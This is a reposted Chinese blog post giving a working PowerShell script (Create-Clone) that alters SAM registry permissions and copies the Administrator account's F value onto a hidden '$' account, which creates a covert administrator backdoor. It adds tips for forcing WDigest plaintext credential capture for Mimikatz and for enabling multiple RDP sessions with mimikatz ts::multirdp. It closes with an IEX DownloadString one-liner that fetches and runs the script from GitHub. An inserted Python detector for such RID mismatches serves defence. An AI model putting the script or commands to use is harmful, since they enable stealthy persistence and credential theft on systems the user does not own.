Can you find me? -- Building a hidden user (PowerShell)

Author: 程序员之家 (Programmers' Home), 2018-05-19 14:55:38

While testing recently I found that on Windows Server 2012 Mimikatz cannot dump plaintext passwords directly, and that an account created the normal way sometimes runs into this problem when logging on:

PS: to dump plaintext passwords on 2012, the "UseLogonCredential" value under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest has to be set to 1 (type DWORD 32-bit); the plaintext password is only captured the next time the user logs on.


Later I found that the old way of building a clone account does let the newly created account log on to the system. For convenience I put together a PowerShell script that changes the permissions on the registry keys automatically (it must be run with administrator privileges, i.e. the privileges you have after a UAC bypass) and then performs the operations. The code is as follows:


function Create-Clone
{
<#
.SYNOPSIS
This script requires Administrator privileges. Use Invoke-TokenManipulation.ps1 to get SYSTEM privileges and create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user's password
.PARAMETER cu
The user to clone, default administrator
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
    Param(
        [Parameter(Mandatory=$true)]
        [String]
        $u,

        [Parameter(Mandatory=$true)]
        [String]
        $p,

        [Parameter(Mandatory=$false)]
        [String]
        $cu = "administrator"
    )
    # regini ACL numbers: 1 = Administrators full access, 17 = SYSTEM full access.
    # upReg grants Administrators access to the SAM user keys; downreg removes it again.
    function upReg{
        "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append  $env:temp\up.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append  $env:temp\up.ini
        cmd /c "regini $env:temp\up.ini"
        Remove-Item $env:temp\up.ini
    }
    function downreg {
        "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append  $env:temp\down.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append  $env:temp\down.ini
        cmd /c "regini $env:temp\down.ini"
        Remove-Item $env:temp\down.ini
    }
    function Create-user ([string]$Username,[string]$Password) {
        $group = "Administrators"
        $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
        if (!$existing) {
            Write-Host "[*] Creating new local user $Username with password $Password"
            & NET USER $Username $Password /add /y /expires:never | Out-Null
            Write-Host "[*] Adding local user $Username to $group."
            & NET LOCALGROUP $group $Username /add | Out-Null
        }
        else {
            Write-Host "[*] Adding existing user $Username to $group."
            & NET LOCALGROUP $group $Username /add | Out-Null
            $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
            $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
            Write-Host "[*] Setting password for existing local user $Username"
            $exist.SetPassword($Password)
        }

        Write-Host "[*] Ensuring password for $Username never expires."
        & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null
    }
    # Resolve a username to the name of its RID subkey (e.g. 000003EA) by exporting
    # Users\Names\<user>; regedit writes the RID as the "type" of the default value: @=hex(3ea):
    function GetUser-Key([string]$user)
    {
        cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini"
        cmd /c "regini $env:temp\$user.ini"
        Remove-Item "$env:temp\$user.ini"
        if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
            cmd /c "regedit /e $env:temp\$user.reg ""HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"""
            $file = Get-Content "$env:temp\$user.reg" | Out-String
            $pattern="@=hex\((.*?)\):"
            $file -match $pattern |Out-Null
            # Key names are the RID as 8 hex digits, so left-pad with zeros.
            $key = $matches[1].PadLeft(8,'0')
            Write-Host "[!]"$key
            return $key
        }else {
            Write-Host "[-] Something wrong !"
        }
    }
    # Copy the F value of the account being cloned onto the new account's key.
    function Clone ([string]$ukey,[string]$cukey) {
        $ukey = $ukey.Trim()
        $cukey = $cukey.Trim()
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini
        "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File -Append $env:temp\f.ini
        cmd /c " regini $env:temp\f.ini"
        Remove-Item $env:temp\f.ini
        $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey"
        $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey"
        Write-Host "[*] Get clone user's F value"
        $cuFreg = Get-Item -Path $cureg
        $cuFvalue = $cuFreg.GetValue('F')
        Write-Host "[*] Change user's F value"
        Set-ItemProperty -path $ureg -Name "F" -value $cuFvalue
        $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
        cmd /c "regedit /e $env:temp\out.reg $outreg"
    }
    function Main () {
        if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
        {
            Write-Output "Script must be run as administrator"
            return
        }
        Write-Output "[*] Start"
        Write-Output "[*] Trying to change reg privilege !"
        upReg
        if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
            Write-Host "[-] The User to Clone does not exist !"
            Write-Output "[*] Change reg privilege back !"
            downreg
            Write-Output "[*] Exiting !"
        }
        else {
            # Remember whether the target user already existed, so it is only deleted if we created it.
            if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
                $tmp = "1"
            }
            else{
                $tmp = "0"
            }
            Write-Output "[*] Create User..."
            Create-user $u $p
            Write-Output "[*] Get User $u's Key .."
            $ukey = GetUser-Key $u | Out-String
            Write-Output "[*] Get User $cu's Key .."
            $cukey = GetUser-Key $cu | Out-String
            Write-Output "[*] Clone User.."
            Clone $ukey $cukey
            if($tmp -eq 1 ){
                Write-Output "[*] Delete User.."
                cmd /c "net User $u /del " |Out-Null
            }else{ Write-Output "[*] Don't need to delete.."}
            # Re-import the Names\<user> key and the cloned Users\<RID> key from the exports.
            cmd /c "regedit /s $env:temp\$u.reg"
            cmd /c "regedit /s $env:temp\out.reg"
            Remove-Item $env:temp\*.reg
            Write-Output "[*] Change reg privilege back !"
            downreg
            Write-Output "[*] Done"
        }
    }
    Main
}
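As a detection-side counterpart to the script above, here is an added Python example (not part of the original post or of the Create-Clone script) that takes a regedit /e export of HKLM\SAM\SAM\Domains\Account\Users, the same export format GetUser-Key parses, and reports every user key whose F value carries a RID that does not match the key it is stored under, which is exactly the state Clone leaves behind (the F value of the cloned account, RID 500 for Administrator, sitting under the new account's own RID key). The sample export is constructed inline; its F values are truncated to the first 0x34 bytes, just enough to reach the RID field at offset 0x30, and the names, RIDs and bytes are made-up values. A real export has to be taken from a SYSTEM context or from an offline copy of the SAM hive.

```python
import re
from typing import Dict, List, Tuple

# Offset of the RID field inside a SAM user "F" value (4 bytes, little-endian).
F_RID_OFFSET = 0x30

USERS_PREFIX = "HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\"
NAMES_PREFIX = USERS_PREFIX + "Names\\"

# Constructed sample: a trimmed regedit /e export. Key 000003EA (demo$) has the
# F value of RID 0x1F4 (Administrator) copied onto it; the other two are normal.
SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,f4,01,\\
  00,00

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003EA]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,f4,01,\\
  00,00

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003EB]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,eb,03,\\
  00,00

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator]
@=hex(1f4):

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\demo$]
@=hex(3ea):

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\alice]
@=hex(3eb):
"""


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a regedit /e export into {key_path: {value_name: raw_data}}.
    Lines ending in a backslash are continuation lines and are joined first."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    pending = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if pending:
            line = pending + line
            pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:
            continue
        name, _, data = line.partition("=")
        keys[current][name.strip('"')] = data
    return keys


def hex_bytes(data: str) -> bytes:
    """Decode a 'hex:02,00,...' value body into bytes."""
    if not data.startswith("hex:"):
        raise ValueError("not a REG_BINARY value: " + data[:16])
    return bytes(int(b, 16) for b in data[4:].split(",") if b)


def rid_from_f(f: bytes) -> int:
    """RID stored inside the F value (offset 0x30, little-endian DWORD)."""
    return int.from_bytes(f[F_RID_OFFSET:F_RID_OFFSET + 4], "little")


def find_cloned_accounts(text: str) -> List[Tuple[str, int, int]]:
    """Return (username, key_rid, rid_inside_F) for every user key whose F value
    belongs to a different RID than the key it lives under."""
    keys = parse_reg_export(text)
    rid_to_name: Dict[int, str] = {}
    for path, values in keys.items():
        if path.startswith(NAMES_PREFIX):
            m = re.match(r"hex\(([0-9a-fA-F]+)\):", values.get("@", ""))
            if m:
                rid_to_name[int(m.group(1), 16)] = path[len(NAMES_PREFIX):]
    findings = []
    for path, values in keys.items():
        if not path.startswith(USERS_PREFIX) or path.startswith(NAMES_PREFIX):
            continue
        if "F" not in values:
            continue
        key_rid = int(path[len(USERS_PREFIX):], 16)
        f_rid = rid_from_f(hex_bytes(values["F"]))
        if f_rid != key_rid:
            findings.append((rid_to_name.get(key_rid, "?"), key_rid, f_rid))
    return findings


if __name__ == "__main__":
    for name, key_rid, f_rid in find_cloned_accounts(SAMPLE_REG):
        print(f"[!] {name}: key RID {key_rid} but F value carries RID {f_rid}")
```

Account creation and the group change made by Create-user also show up in the Security log as events 4720 and 4732, but the F-value overwrite itself is only logged (event 4657) when a SACL with object-access auditing is set on the SAM user keys, so the offline comparison above is the more dependable check.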




Once the account has been created, it can log on to the system successfully.


The test on Win7 went as follows:


Demo: https://evi1cg.me/usr/uploads/2017/11/clone.gif


Naturally this can be combined with the following trick to allow multiple users to be logged on at once.


Using mimikatz.exe, run ts::multirdp to allow multiple users to log on remotely.


PS: this method stops working after a reboot; next time you need to run ts::multirdp again, or patch termsrv.dll to make the change permanent.


Finally, the remote execution method:


powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1'); Create-Clone -u demo$ -p test123


Source: Evi1cg's blog

Original link: https://evi1cg.me/archives/UserClone.html
